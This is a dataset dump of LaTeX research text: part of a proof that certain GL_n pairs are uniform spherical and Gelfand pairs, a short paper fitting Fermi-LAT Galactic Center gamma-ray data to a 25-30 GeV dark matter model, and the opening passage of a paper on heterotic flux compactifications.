\begin{prop} \label{peop:F.sph} Let $F$ be an infinite field, and consider $G=\GL_{n_1}\times\cdots\times\GL_{n_k}$ embedded in the standard way in $M=\M_{n_1}\times\cdots\times\M_{n_k}$. Let $A,B\subset G \otimes F$ be two $F$-subgroups whose closures in $M$ are affine subspaces $M_A,M_B$.
\begin{enumerate}
\item For any $x,y\in G(F)$, if the variety $\{(a,b)\in A\times B | axb=y\}$ is non-empty, then it has an $F$-rational point.
\item If $(G,A)$ is a spherical pair, then it is also an $F$-spherical pair.
\end{enumerate}
\end{prop}
\begin{proof} \begin{enumerate}
\item Denote the projections $G\to\GL_{n_j}$ by $\pi_j$. Assume that $x,y\in G(F)$, and there is a pair $(\overline{a},\overline{b})\in (A\times B)(\overline{F})$ such that $\overline{a}x\overline{b}=y$. Let $L\subset M_A\times M_B$ be the \Dima{affine} subspace $\{(\alpha,\beta)| \alpha x=y\beta\}$, defined over $F$. By assumption, the functions $(\alpha,\beta)\mapsto \det\pi_j(\alpha)$ and $(\alpha,\beta)\mapsto\det\pi_j(\beta)$, for $j=1,\ldots,k$, are non-zero on $L(\overline{F})$. Hence there is $(a,b)\in L(F)\cap G$, which means that $axb^{-1}=y$.
\item Applying (1) to $A$ and \Dima{any} parabolic subgroup $B\subset G$, any $(A\times B)(\overline{F})$-orbit in $G(\overline{F})$ contains at most one $(A\times B)(F)$-orbit. Since there are only finitely many $(A\times B)(\overline{F})$-orbits in $G(\overline{F})$, the pair $(G,A)$ is $F$-spherical.
\end{enumerate}
\end{proof}
\subsection{The Pair $(\GL_{n+k},\GL_n \times\GL_k)$}
\lbl{subsec:JR}$ $
In this subsection we assume $p\neq 2$ and consider only local fields of characteristic
different from 2.
Let $G:=(\GL_{n+k})_R$ and $H:=(\GL_n)_R \times (\GL_k)_R < G$ be the subgroup of
block matrices. Note that $H$ is a symmetric subgroup since it
consists of fixed points of conjugation by $\epsilon =
\begin{pmatrix}
Id_{k} & 0 \\
0 & -Id_{n}
\end{pmatrix}$. We prove that $(G,H)$ is a Gelfand pair
using Corollary \ref{cor:GelGel}.
The pair $(G,H)$ is a symmetric pair, hence it is a spherical pair and therefore by Proposition \ref{peop:F.sph} it is $F$-spherical.
The second condition of Corollary \ref{cor:GelGel}
is \cite[Theorem 1.1]{JR}. It
remains to prove that $(G,H)$ is a uniform spherical pair.
\begin{prop} \lbl{prop:JR}
The pair $(G,H)$ is uniform spherical.
\end{prop}
\begin{proof}
Without loss of generality suppose that $n \geq k$.
Let $\mathfrak X=\{x_0\}$, where
$$
x_0:=\begin{pmatrix}
Id_{k} & 0 & Id_{k} \\
0 & Id_{n-k} & 0\\
0 & 0 & Id_k
\end{pmatrix} H \text{ and } \Upsilon=\{(\mu_1,...,\mu_k,0,...,0) \in X_*(T) \, | \, \mu_1 \leq ... \leq
\mu_k \leq 0\}.$$
To show the first condition we show that every double
coset in $K_0\backslash G/H$ includes an element of the form
$\begin{pmatrix}
Id_{k} & 0 & diag(\pi^{\mu_1},...,\pi^{\mu_k}) \\
0 & Id_{n-k} & 0\\
0 & 0 & Id_k
\end{pmatrix}\text{ s.t. } \mu_1 \leq ... \leq
\mu_k \leq 0.$ Take any $g \in G$. By left multiplication by $K_0$
we can bring it to upper triangular form. By right multiplication
by $H$ we can bring it to a form $\begin{pmatrix}
Id_{n} & A \\
0 & Id_{k}
\end{pmatrix}$. Conjugating by a matrix $\begin{pmatrix}
k_1 & 0 \\
0 & k_2
\end{pmatrix}\in K_0 \cap H$ we can replace it by $\begin{pmatrix}
Id_{n} & k_1Ak_2^{-1} \\
0 & Id_{k}
\end{pmatrix}$. Hence we can bring $A$ to be a $k$-by-$(n-k)$ block of zero, followed by the a diagonal matrix of the form $diag(\pi^{\mu_1},...,\pi^{\mu_k})$ s.t. $\mu_1 \leq ... \leq
\mu_k .$ Multiplying by an element of
$K_0$ of the form $\begin{pmatrix}
Id_{k} & 0 & k \\
0 & Id_{n-k} & 0\\
0 & 0 & Id_k
\end{pmatrix}$ we can bring $A$ to the desired form. \\
As for the second condition, we first compute the stabilizer ${G}_{x_0}$ of $x_0$ in $G$.
Note that the coset $x_0 \in G/H$ equals
$$ \left \{
\begin{pmatrix}
g_1 & g_2 & h \\
g_3 & g_4 & 0\\
0 & 0 & h
\end{pmatrix}
| \begin{pmatrix}
g_1 & g_2 \\
g_3 & g_4
\end{pmatrix} \in (\GL_n)_R,\, h \in (\GL_k)_R \right \}$$
and
$$\begin{pmatrix}
A & B & C\\
D & E & F\\
G & H & I
\end{pmatrix}
\begin{pmatrix}
Id_{k} & 0 & Id_{k} \\
0 & Id_{n-k} & 0\\
0 & 0 & Id_k
\end{pmatrix} = \begin{pmatrix}
A & B & A+C\\
D & E & D+F\\
G & H & G+I
\end{pmatrix}.$$
Hence $$G_{x_0}= \left \{ \begin{pmatrix}
g_1 & g_2 & h - g_1 \\
g_3 & g_4 & -g_3\\
0 & 0 & h
\end{pmatrix}
| \begin{pmatrix}
g_1 & g_2 \\
g_3 & g_4
\end{pmatrix} \in (\GL_n)_R,\, h \in (\GL_k)_R \right \}.$$
Therefore, for any $\delta_1 = (\lambda_{1,1},...,\lambda_{1,k},0,...,0), \delta_2 = (\lambda_{2,1},...,\lambda_{2,k},0,...,0)\in
\Upsilon$,
\begin{multline*}
{G(F)}_{\pi^{\lambda_1}x_0,\pi^{\lambda_2}x_0} = \left \{ \begin{pmatrix}
\pi^{\lambda_2}g_1\pi^{-\lambda_1} & \pi^{\lambda_2}g_2 & \pi^{\lambda_2}(h - g_1) \\
g_3\pi^{-\lambda_1} & g_4 & -g_3\\
0 & 0 & h
\end{pmatrix}\, |\,
\begin{pmatrix}
g_1 & g_2 \\
g_3 & g_4
\end{pmatrix} \in (\GL_n)_R,\, h \in (\GL_k)_R \right \}=\\
= \left \{ \begin{pmatrix}
A & B & C \\
D & E & F\\
0 & 0 & I
\end{pmatrix}\in GL_{n+k}, |D=-F\pi^{-\lambda_1}, C=\pi^{\lambda_2}I-A\pi^{\lambda_1} \right \}.
\end{multline*}
The second condition of Definition \ref{defn:good.pair} follows now from Lemma
\ref{lem:SmoothCrit}.\\
As for the third condition, we use the embedding $G/H\to G$ given by $g\mapsto g\epsilon g^{-1} \epsilon$. It is easy to see that $val_F(\pi^\mu x_0)=\mu_1,$ which
is independent of $F$.
\DimaGRCor{ Let us now prove the last condition using Lemma
\ref{lem:GRCrit}. Take $l_0=1$ and $$P:= \left \{ \begin{pmatrix}
Id & 0 & 0 \\
D & E & F\\
G & H & I
\end{pmatrix}\in GL_{n+k} \right \}.$$
Let $P_l:=P(F)\cap K_l(GL_{n+k},F).$
The first condition of Lemma \ref{lem:GRCrit} obviously holds. To
show the second condition, we have to show that for any $F$, any
$l \geq 1$ and any $g \in K_l(GL_{n+k},F)$ there exist $p \in
P_l$ and $h\in H(F)$ such that $gx_0=
px_oh$. In other words, we have to solve the following equation:
$$
\begin{pmatrix}
Id_k+A & B & Id_k+A+C\\
D & Id_{n-k}+E & D+F\\
G & H & Id_k+G+I
\end{pmatrix}=
\begin{pmatrix}
Id_k & 0 & Id_k\\
D' & Id_{n-k}+E' & D'+F'\\
G' & H' & Id_k+G'+I'
\end{pmatrix}
\begin{pmatrix}
Id_k+x & y & 0\\
z & Id_k+w & 0\\
0 & 0 & Id_k+h
\end{pmatrix},
$$
where all the \RGRCor{capital} letters denote matrices of appropriate sizes with entries in $\pi^l\mathcal O_F$, and the matrices in the left hand side are parameters and matrices in the right hand side are unknowns.
The solution is given by:
\begin{multline*}
x=A, \quad y=B, \quad z=D , \quad \RGRCor{w=} E , \quad h= A+C \\
D' = 0, \quad E'=0, \quad F' = (D+F) (Id_k +A+C)^{-1},\\
H'=(H-G(Id_k+A)^{-1}B)(-D(Id_k+A)^{-1}B+Id_{n-k}+E)^{-1}\\
G'=(G-H'D)(Id_k+A)^{-1}, \quad
I'=(G+I-A-C)(Id_k+A+C)^{-1} - G'
\end{multline*}}
\end{proof}
\subsection{Structure of the spherical space $(\GL_{n+1}\times\GL_n)/\Delta \GL_n$} \lbl{subsec:PfGood}
Consider the embedding $\iota:\GL_n\hookrightarrow \GL_{n+1}$
given by
\[
A\mapsto\left( \begin{matrix} 1&0\\0&A\end{matrix}\right).
\]
Denote $G=\GL_{n+1}(F)\times\GL_n(F)$ and $H=\Delta \GL_n(F)$.
The quotient space $G/H$ is isomorphic to $(\GL_{n+1})_R$ via the map
$(g,h)\mapsto g\iota(h^{-1})$. Under this isomorphism, the action
of $G$ on $G/H$ becomes $ (g,h)\cdot X=gX\iota(h^{-1})$.
The space $G/H$ is spherical.
Indeed, let $B\subset G$ be the
Borel subgroup consisting of pairs $(b_1,b_2)$, where $b_1$ is
lower triangular and $b_2$ is upper triangular, and let $x_0\in G/H$
be the point represented by the matrix
\[
x_0=\bmat1&e\\0&I\end{matrix}\right),
\]
where $e$ is a row vector of 1's. We claim that $Bx_0$ is open in
$G/H$. Let $\mathfrak b$ be the Lie algebra of $B$. It consists of pairs
$(X,Y)$ where $X$ is lower triangular and $Y$ is upper triangular.
The infinitesimal action of $\mathfrak b$ on $X$ at $x_0$ is given by
$(X,Y)\mapsto Xx_0-x_0d\iota(Y)$. To show that the image is
$\M_{n+1}$, it is enough to show that the images of the maps
$X\mapsto Xx_0$ and $Y\mapsto x_0d\iota(Y)$ have trivial
intersection. Suppose that $Xx_0=x_0d\iota(Y)$. Then
$X=x_0d\iota(Y)x_0^{-1}$, i.e.
\[
X=\bmat1&e\\&I\end{matrix}\right)\bmat0&0\\0&Y\end{matrix}\right)\bmat1&-e\\&I\end{matrix}\right)=\bmat0&eY\\0&Y\end{matrix}\right).
\]
Since $X$ is lower triangular and $Y$ is upper triangular, both
have to be diagonal. But $eY=0$ implies that $Y=0$, and hence also
$X$=0. Proposition \ref{peop:F.sph} implies that the pair $(G,H)$ is $F$-spherical.
The following describes the quotient $G(O_F)\backslash G(F)/H(F)$.
\begin{lem} \lbl{lem:singular.values} For every matrix $A\in\M_{n+1}(F)$ there are $k_1\in\GL_{n+1}(O)$ and $k_2\in\GL_n(O)$ such that
\begin{equation} \lbl{eq:pi.la}
k_1A\iota(k_2)=\left( \begin{matrix}\pi^a&\pi^{b_1}&\pi^{b_2}&\dots&\pi^{b_n}\\&\pi^{c_1}&&&\\ &&\pi^{c_2}&\\&&&\ddots&\\ &&&&\pi^{c_n}\end{matrix}\right),
\end{equation}
where the numbers $a,b_i,c_i$ satisfy that if $i<j$ then $c_i-c_j\leq b_i-b_j\leq0$ and $b_1\leq c_1$.
\end{lem}
\begin{proof} Let $a$ be the minimal valuation of an element in the first column of $A$. There is an integral matrix $w_1$ such that the first column of the matrix $w_1A$ is $\pi^a,0,0,\ldots,0$. Let $C$ be the $n\times n$ lower-right sub-matrix of $w_1A$. By Cartan decomposition, there are integral matrices $w_2,w_3$ such that $w_2Cw_3^{-1}$ is diagonal, and its diagonal entries are $\pi^{c_i}$ for a non-decreasing sequence $c_i$. Finally, there are integral and diagonal matrices $d_1,d_2$ such that the matrix $d_1\iota(w_2)w_1A\iota(w_3^{-1})\iota(d_2^{-1})$ has the form (\ref{eq:pi.la}).
Suppose that $i<j$ and $b_i>b_j$. Then adding the $j$'th column to the $i$'th column and subtracting $\pi^{c_j-c_i}$ times the $i$'th row to the $j$'th row, we can change the matrix (\ref{eq:pi.la}) so that $b_i=b_j$. Similarly, if $i<j$ and $b_i-b_j<c_i-c_j$, then adding $\pi^{b_j-b_i-1}$ times the $i$'th column to the $j$'th column, and subtracting $\pi^{c_i+b_j-b_i-1-c_j}$ times the $j$'th row to the $i$'th row changes the matrix (\ref{eq:pi.la}) so that $b_i$ becomes smaller in $1$. Finally, if $c_1<b_1$ than adding the second row to the first changes the matrix so that $c_1=b_1$.
\end{proof}
Let $T\subset G$ be the torus
consisting of pairs $(t_1,t_2)$ such that $t_i$ are diagonal. The
co-character group of $T$ is the group $\mathbb Z^{n+1}\times\mathbb Z^n$. The
positive Weyl chamber of $T$ that is defined by $B$\footnote{The positive Weyl chamber defined by the Borel $B$ is the subset of co-weights $\lambda$ such that $\pi^{\lambda}B(O)\pi^{-\lambda}\subset B(O)$} is the set
$\Delta\subset X_*(T)$ consisting of pairs $(\mu,\nu)$ such that the
$\mu_i$'s are non-decreasing and the $\nu_i$'s are non-increasing.
Lemma \ref{lem:singular.values} implies that the set
$\left\{\pi^\lambda x_0\right\}_{\lambda\in\Delta}$ is a complete set of
orbit representatives for $G(O)\backslash G(F)/H(F)$.\\
We are ready to prove that $(G,H)$ is uniform spherical.
\begin{prop} \lbl{prop:good.pair.GLn+1xGLn} The pair $((\GL_{n+1})_R\times(\GL_n)_R, \Delta (\GL_n)_R)$ is uniform spherical.
\end{prop}
\begin{proof}
Let $\Upsilon\subset X_*(T)$ be the positive Weyl chamber and let $\mathfrak X:=\{x_0\}$. By the above, the first condition of Definition \ref{defn:good.pair} holds. As for the second condition, an easy computation shows that if $a,b_1,\ldots,b_n,c_1,\ldots,c_n\in\mathbb Z$, $a',b_1',\ldots,b_n',c_1',\ldots,c_n'\in\mathbb Z$ satisfy the conclusion of Lemma \ref{lem:singular.values}, and $(k_1,k_2)\in G(O)$ satisfy that
\[
k_1\left( \begin{matrix}\pi^a&\pi^{b_1}&\pi^{b_2}&\dots&\pi^{b_n}\\&\pi^{c_1}&&&\\ &&\pi^{c_2}&\\&&&\ddots&\\ &&&&\pi^{c_n}\end{matrix}\right)\iota(k_1)=\left( \begin{matrix}\pi^{a'}&\pi^{b_1'}&\pi^{b_2'}&\dots&\pi^{b_n'}\\&\pi^{c_1'}&&&\\ &&\pi^{c_2'}&\\&&&\ddots&\\ &&&&\pi^{c_n'}\end{matrix}\right),
\]
then $a=a'$, $c_i=c_i'$, $k_1$ has the form $\bmat1&B\\0&D\end{matrix}\right)$,
where $B$ is a $1\times n$ matrix and $D$ is an $n\times n$ matrix
that satisfy the equations $D=\pi^c k_2\pi^{-c}$ and
$B\pi^c=\pi^b-\pi^{b'}k_2$, where $\pi^c$ denotes the diagonal
matrix with entries $\pi^{c_1},\ldots,\pi^{c_n}$, $\pi^b$ denotes
the row vector with entries $\pi^{b_i}$, and $\pi^{b'}$ denotes
the row vector with entries $\pi^{b_i'}$. The second condition of
Definition \ref{defn:good.pair} holds by Lemma \ref{lem:SmoothCrit}.
\RGRCor{The} third condition follows because, using the affine embedding as above,
$\pi^\lambda x_0$
has the form (\ref{eq:pi.la}) and so
$val_F(\pi^\lambda x_0)$
is independent of $F$.
\RGRCor{
Finally it is left to verify the last condition. In the following, we will distinguish between the $\ell$th congruence subgroup in $\GL_{n+1}(F)$, which we denote by $K_\ell(\GL_{n+1}(F))$, the $\ell$th congruence subgroup in $\GL_{n}(F)$, which we denote by $K_\ell(\GL_{n}(F))$, and the $\ell$th congruence subgroup in $G=\GL_{n+1}(F)\times\GL_n(F)$, which we denote by $K_\ell$. By lemma \ref{lem:GRCrit} it is enough to show that $(B\cap K_l) x_0=K_lx_0.$ It is easy to see that $K_lx_0= x_0+\pi^{l}Mat_{n}(O_{F}).$ Let $y \in x_0+\pi^{l}Mat_{n}(O_{F})$. We have to show that $y\in (B\cap K_l) x_0$. In order to do this let us represent $y$ as a block matrix $$y=\left( \begin{matrix} a&b\\c&D\end{matrix}\right),$$ where $a$ is a scalar and $D$ is $n\times n$ matrix. Using left multiplication by lower triangular matrix from $K_l(\GL_{n+1}(F))$ we may bring $y$ to the form $\bmat1&b'\\0&D'\end{matrix}\right)$. We can decompose $D'=LU$, where $L,U \in K_l(\GL_{n+1}(F))$ and $L$ is lower triangular and $U$ is upper triangular. Therefore by action of an element from $B\cap K_l$ we may bring $y$ to the form $\bmat1&b''\\0&Id\end{matrix}\right)$. Using right multiplication by diagonal matrix from $K_l(\GL_{n+1}(F))$ (with first entry 1) we may bring $y$ to the form $\bmat1&e\\0&D''\end{matrix}\right),$ where $e$ is a row vector of 1's and $D''$ is a diagonal matrix. Finally, using left multiplication by diagonal matrix from $K_l(\GL_{n+1}(F))$ we may bring $y$ to be $x_0.$
}
\end{proof}
\subsection{The Pair $(\GL_{n+1}\times\GL_n,\Delta \GL_n)$}
\lbl{subsec:GL}$ $
In this section we prove Theorem \ref{thm:Mult1} which states that
$(\GL_{n+1}(F),\GL_n(F))$ is a strong Gelfand pair for any local
field $F$, i.e. for any irreducible smooth representations $\pi$
of $\GL_{n+1}(F)$ and $\tau$ of $\GL_{n}(F)$ we have
$$\dim \Hom_{\GL_{n}(F)} (\pi, \tau) \leq 1.$$
It is well known (see e.g. \cite[section 1]{AGRS})
that this theorem is equivalent to the statement that
$(\GL_{n+1}(F)\times\GL_n(F),\Delta \GL_n(F))$, where $\Delta
\GL_n$ is embedded in $\GL_{n+1}\times\GL_n$ by the map
$\iota\times Id$, is a Gelfand pair.
By Corollary \ref{cor:GelGel} this statement follows from Proposition \ref{prop:good.pair.GLn+1xGLn}, and the following
\RGRCor{theorem:}
\begin{thm}[\cite{AGRS}, Theorem 1]
Let $F$ be a local field of characteristic 0. Then
$(\GL_{n+1}(F),\GL_n(F))$ is a strong Gelfand pair.
\end{thm}
| 2024-02-18T23:40:06.609Z | 2011-07-07T02:01:48.000Z | algebraic_stack_train_0000 | 1,365 | 16,851 |
|
proofpile-arXiv_065-6727 | \section{Introduction}
Searches for dark matter annihilation products are among the most exciting missions of the Fermi Gamma Ray Space Telescope (FGST). In particular, the FGST collaboration hopes to observe and identify gamma rays from dark matter annihilations occuring cosmologically~\cite{cosmo}, as well as within the Galactic Halo~\cite{halo}, dwarf galaxies~\cite{dwarf}, microhalos~\cite{micro}, and the inner region of the Milky Way~\cite{inner}.
Due to the very high densities of dark matter predicted to be present in the central region of our galaxy, the inner Milky Way is expected to be the single brightest source of dark matter annihilation radiation in the sky. This region is astrophysically rich and complex, however, making the task of separating dark matter annihilation products from backgrounds potentially challenging. In particular, the Galactic Center contains a $2.6\times 10^6\, M_{\odot}$ black hole coincident with the radio source Sgr A$^*$~\cite{ghez}, the supernova remnant Sgr A East, and a wide variety of other notable astrophysical objects, including massive O and B type stars, and massive compact star clusters (Arches and Quintuplet).
Since its launch in June of 2008, the Large Area Telescope (LAT) onboard the FGST has identified as photons several hundred thousand events from within a few degrees around the Galactic Center. In addition to possessing the effective area required to accumulate this very large number of events, the angular resolution and energy resolution of the FGST's LAT are considerably improved relative to those of its predecessor EGRET. As a result, this new data provides an opportunity to perform a powerful search for evidence of dark matter annihilation~\cite{fermidark}.
Dark matter annihilations are predicted to produce a distribution of gamma rays described by:
\begin{equation}
\Phi_{\gamma}(E_{\gamma},\psi) =\frac{1}{2} <\sigma v> \frac{dN_{\gamma}}{dE_{\gamma}} \frac{1}{4\pi m^2_{\rm{dm}}} \int_{\rm{los}} \rho^2(r) dl(\psi) d\psi,
\label{flux1}
\end{equation}
where $<\sigma v>$ is the dark matter particle's self-annihilation cross section (multiplied by velocity), $m_{\rm dm}$ is the dark matter particle's mass, $\psi$ is the angle away from the direction of the Galactic Center that is observed, $\rho(r)$ describes the dark matter density profile, and the integral is performed over the line-of-sight. $dN_{\gamma}/dE_{\gamma}$ is the spectrum of prompt gamma rays generated per annihilation, which depends on the dominant annihilation channel(s). Note that Eq.~\ref{flux1} provides us with predictions for both the distribution of photons as a function of energy, and as a function of the angle observed. It is this powerful combination of signatures that we will use to identify and separate dark matter annihilation products from astrophysical backgrounds~\cite{method}.
With a perfect gamma ray detector, the distribution of dark matter events observed would follow precisely that described in Eq.~\ref{flux1}. The LAT of the FGST has a finite point spread function, however, which will distort the observed angular distribution. In our analysis, we have modeled the point spread function of the FGST's LAT according to the performance described in Ref.~\cite{performance}.
In addition to any gamma rays from dark matter annihilations coming from the region of the Galactic Center, significant astrophysical backgrounds are known to exist. In particular, HESS~\cite{hess} and other ground-based gamma ray telescopes~\cite{other} have detected a rather bright gamma ray source coincident with the dynamical center of our galaxy ($l=-0.055^{\circ}$, $b=0.0442^{\circ}$). The spectrum of this source has been measured to be a power-law of the form $dN_{\gamma}/dE_{\gamma} \approx 10^{-8} \, {\rm GeV}^{-1}\, {\rm cm}^{-2}\, {\rm s}^{-1} (E/{\rm GeV})^{-2.25}$ between approximately 160 GeV and 20 TeV. Although HESS and other ground-based telescopes cannot easily measure the spectrum of this source at lower energies, it is likely that it will extend well into the range studied by the FGST~\cite{dermer}, where it will provide a significant background for dark matter searches~\cite{gabi}. Furthermore, gamma ray emission from numerous faint point sources and/or truly diffuse sources can provide a formidable background in the region of the Galactic Center, especially near the disk of the Milky Way. To model this background, we have studied the angular distribution of photons observed by the FGST in the region of $3^{\circ}< |l| <6^{\circ}$, and found that the emission is fairly well described by a function which falls off exponentially away from the disk with a scale of roughly $2.2^{\circ}$ to $1.2^{\circ}$ for photons between 300 MeV and 30 GeV, respectively. In addition to the previously described HESS point source, we will use this angular distribution as a template to model the diffuse background in our analysis.
To start, we consider dark matter distributed according to a Navarro-Frenk-White (NFW)~\cite{nfw} halo profile with a scale radius of 20 kpc and normalized such that the dark matter density at the location of the Solar System is equal to its value inferred by observations~\cite{ullio}. This profile, however, combined with the background model described above, leads to a distribution of photons that falls off more slowly as a function of angle from the Galaxy's dynamical center than is observed by the FGST. If we steepen the halo profile slightly, such that $\rho(r) \propto 1/r^{\gamma}$, with $\gamma=1.1$ ($\gamma=1.0$ for an NFW profile), the angular distribution of the events matches the observations of the FGST very well. Such a steepening of the inner cusp could result from, for example, the adiabatic contraction of the profile due to the dynamics of the baryonic gas which dominate the gravitational potential of the Inner Galaxy~\cite{ac}.
In Fig.~\ref{angular}, we show the angular distribution of gamma rays as a function of angle from the Galaxy's dynamical center, as measured by the FGST over the period of August 4, 2008 to October 5, 2009, corresponding to an exposure in the Galactic Center region of approximately $2.2\times 10^{10}$ cm$^2$ sec at 300 MeV, and increasing to between 3.5-4.3 $\times 10^{10}$ cm$^2$ sec between 1 and 300 GeV. We include only those events in the ``diffuse'' class (as defined by the FGST collaboration) and do not include events with zenith angle greater than 105$^{\circ}$, or from the region of the South Atlantic Anomaly. Below 10 GeV, we show separately those events that were converted in the front (thin) and back (thick) regions of the detector (these are treated separately to account for the differing point spread functions for these event classes). In each frame, we compare these measurements to the angular distribution predicted for photon from annihilating dark matter with $\gamma=1.1$, the HESS point source, the diffuse background, and for the sum of these contributions. In each case, these predictions take into account the point spread function of the FGST. For each range of energies shown, we have normalized the diffuse background and dark matter contributions to provide the best fit to the data. Above 1 GeV, the normalization of the HESS source was determined by extrapolating the measured power law spectrum to lower energies, which appears to be consistent with the distribution observed by the FGST. Below 1 GeV, the FGST data do not appear to contain significant emission from this point source, so we suppress this contribution in these energy bins under the assumption that the extrapolation of the HESS spectrum becomes invalid around $\sim 1$ GeV.
\begin{figure*}[!]
\begin{center}
{\includegraphics[angle=0,width=0.37\linewidth]{11eventsangle300-600-frontonly-diskdiffuse.ps}}
\hspace{0.5cm}
{\includegraphics[angle=0,width=0.37\linewidth]{11eventsangle300-600-backonly-diskdiffuse.ps}}\\
{\includegraphics[angle=0,width=0.37\linewidth]{11eventsangle600-1-frontonly-diskdiffuse.ps}}
\hspace{0.5cm}
{\includegraphics[angle=0,width=0.37\linewidth]{11eventsangle600-1-backonly-diskdiffuse.ps}}\\
{\includegraphics[angle=0,width=0.37\linewidth]{11eventsangle1-10-frontonly-diskdiffuse.ps}}
\hspace{0.5cm}
{\includegraphics[angle=0,width=0.37\linewidth]{11eventsangle1-10-backonly-diskdiffuse.ps}}\\
{\includegraphics[angle=0,width=0.37\linewidth]{11eventsanglegt10-diskdiffuse.ps}}
\hspace{0.5cm}
{\includegraphics[angle=0,width=0.37\linewidth]{11eventsanglegt30-diskdiffuse.ps}}\\
\vspace{-0.3cm}
\caption{The angular distribution of gamma rays around the Galactic Center observed by the FGST. In each frame, the dashed line denotes the shape predicted for the annihilation products of dark matter distributed according to a halo profile which is slightly cuspier than NFW ($\gamma=1.1$). The dotted line is the prediction from the previously discovered TeV point source located at the Milky Way's dynamical center, while the dot-dashed line denotes the diffuse background described in the text (which, although included in each case, falls below the range of rates shown in the upper four frames). The solid line is the sum of these contributions.}
\label{angular}
\end{center}
\end{figure*}
Thus far, we have performed these fits while remaining agnostic about the mass, annihilation cross section, and dominant annihilation channels of the dark matter particle, simply normalizing the angular shape predicted by our selected halo profile to the data. By comparing the relative normalizations required in each energy range shown in Fig.~\ref{angular}, however, one can infer the shape of the gamma ray spectrum from our dark matter component and for the diffuse background. In particular, the relative normalizations required of the diffuse component in the various energy ranges shown in Fig.~\ref{angular} imply that this background has a spectrum very approximately of the form $dN_{\gamma}/dE_{\gamma} \propto E^{-2.3}$.
In Fig.~\ref{spectrum}, we show the spectrum of photons observed by the FGST within 0.5$^{\circ}$ and 3$^{\circ}$ of the Galaxy's dynamical center, and compare this to the spectrum in our best fit annihilating dark matter (plus diffuse and HESS point source backgrounds) model, including the effect of the FGST's point spread function (which noticeably suppresses the lowest energy emission in the left frame). The distinctive bump-like feature observed at $\sim$1-5 GeV is easily accommodate by a fairly light dark matter particle ($m_{\rm dm} \approx 25-30$ GeV) which annihilates to a $b \bar{b}$ final state. The normalization was best fit to an annihilation cross section of $\sigma v \approx 9 \times 10^{-26}$ cm$^3$/s, which is a factor of about three times larger than that predicted for a simple $s$-wave annihilating thermal relic.
\begin{figure*}[!]
\begin{center}
{\includegraphics[angle=0,width=0.49\linewidth]{11pt5degreespec-diskdiffuse.ps}}
\hspace{0.1cm}
{\includegraphics[angle=0,width=0.49\linewidth]{113degreespec-diskdiffuse.ps}}\\
\vspace{-0.3cm}
\caption{The gamma ray spectrum measured by the FGST within 0.5$^{\circ}$ (left) and 3$^{\circ}$ (right) of the Milky Way's dynamical center. In each frame, the dashed line denotes the predicted spectrum from a 28 GeV dark matter particle annihilating to $b\bar{b}$ with a cross section of $\sigma v = 9\times 10^{-26}$ cm$^3$/s, and distributed according to a halo profile slightly more cusped than NFW ($\gamma=1.1$). The dotted and dot-dashed lines denote the contributions from the previously discovered TeV point source located at the Milky Way's dynamical center and the diffuse background, respectively. The solid line is the sum of these contributions.}
\label{spectrum}
\end{center}
\end{figure*}
It is interesting to note that the annihilation rate and halo profile shape found to best accommodate the FGST data here is very similar to that required to produce the excess synchrotron emission known as the ``WMAP haze''~\cite{wmaphaze}. To be produced by a dark matter particle as light as that described in this scenario, however, the observed hardness of the haze spectrum requires a fairly strong magnetic field in the region of the Galactic Center. It had been previously recognized that if the WMAP haze is the product of dark matter annihilations, then the FGST would likely be capable of identifying the corresponding gamma ray signal~\cite{Hooper:2007gi}.
The low mass and relatively large annihilation cross section required in this scenario are also encouraging for the prospects of other gamma ray searches for dark matter annihilation products, such as those observing dwarf galaxies and efforts to detect nearby subhalos.
In conclusion, we have studied the angular distribution and energy spectrum of gamma rays measured by the Fermi Gamma Ray Space Telescope in the region surrounding the Galactic Center, and find that this data is well described by a scenario in which a 25-30 GeV dark matter particle, distributed with a halo profile slightly steeper than NFW ($\gamma =1.1$), is annihilating with a cross section within a factor of a few of the value predicted for a thermal relic.
It should be noted, however, that if astrophysical backgrounds exist with a similar spectral shape and morphology to those predicted for annihilating dark matter (a spectrum peaking at $\sim 1-3$ GeV, distributed with approximate spherical symmetry around the Galactic Center proportional to $r^{-2.2}$), the analysis performed here would not differentiate the resulting background from dark matter annihilation products. Gamma rays from pion decay taking place with a roughly spherically symmetric distribution around the Galactic Center, for example, could be difficult to distinguish. Further information will thus be required to determine the origin of these photons.
{\it Acknowledgements:} We would like to thank Doug Finkbeiner for his help in processing the FGST data. We would also like to thank Greg Dobler and Neal Weiner for their helpful comments. DH is supported by the US Department of Energy, including grant DE-FG02-95ER40896, and by NASA grant NAG5-10842.%
| 2024-02-18T23:40:06.705Z | 2009-11-11T20:55:59.000Z | algebraic_stack_train_0000 | 1,368 | 2,298 |
|
proofpile-arXiv_065-6738 | \section{Introduction}
Heterotic compactifications to four dimensions have acquired over the years a cardinal interest for phenomenological applications, as their geometrical data combined with the
specification of a holomorphic gauge bundle have played a major role in recovering close relatives to the \textsc{mssm} or intermediate \textsc{gut}s. However, as their type
\textsc{ii} counterparts, heterotic Calabi-Yau compactifications are generally plagued with the presence of unwanted scalar degrees of freedom at low-energies.
A fruitful strategy to confront this issue has proven to be the inclusion of fluxes through well-chosen cycles in the compactification manifold. Considerable effort has been successfully
invested in engineering such constructions in type \textsc{ii} supergravity scenarii (see~\cite{Grana} for a review and references therein). However, if one is eventually to uncover the
quantum theory underlying these backgrounds, warranting their consistency as string theory vacua, or to evade the large-volume limit where supergravity is valid,
one has to face the presence of \textsc{rr} fluxes intrinsic to these type \textsc{ii} backgrounds, for which a worldsheet analysis is still lacking.
In this respect, heterotic geometries with \textsc{nsns} three-form and gauge fluxes are more likely to allow for such a description~; the dilaton not being stabilized
perturbatively the worldsheet theory should be amenable to standard \textsc{cft} techniques. The generic absence of large-volume limit in heterotic flux compactifications makes even this
appealing possibility a {\it necessity}. An attempt in uncovering an underlying worldsheet theory for heterotic flux vacua has been made
in~\cite{Adams:2006kb,Adams:2009zg} by resorting to linear sigma-model techniques. This approach however yields
a fully tractable description only in the \textsc{uv}, while the interacting \textsc{cft} obtained in the \textsc{ir} is not known explicitly.
A consistent smooth heterotic compactification requires determining a gauge bundle that satisfies a list of consistency conditions. This sheds yet another light on the appearance of
non-trivial Kalb-Ramond fluxes, now understood as the departure, triggered by the choice of an alternative gauge bundle, from the standard embedding of the spin connection into the
gauge connection that characterizes Calabi-Yau compactifications. This eventually leads to geometries with torsion. Now, heterotic flux compactifications, although
known for a long time (see e.g.~\cite{Strominger:1986uh,Hull:1986kz,Becker:2002sx,Curio:2001ae,Louis:2001uy,LopesCardoso:2003af,Becker:2003yv,Becker:2003sh,Becker:2005nb,Benmachiche:2008ma})
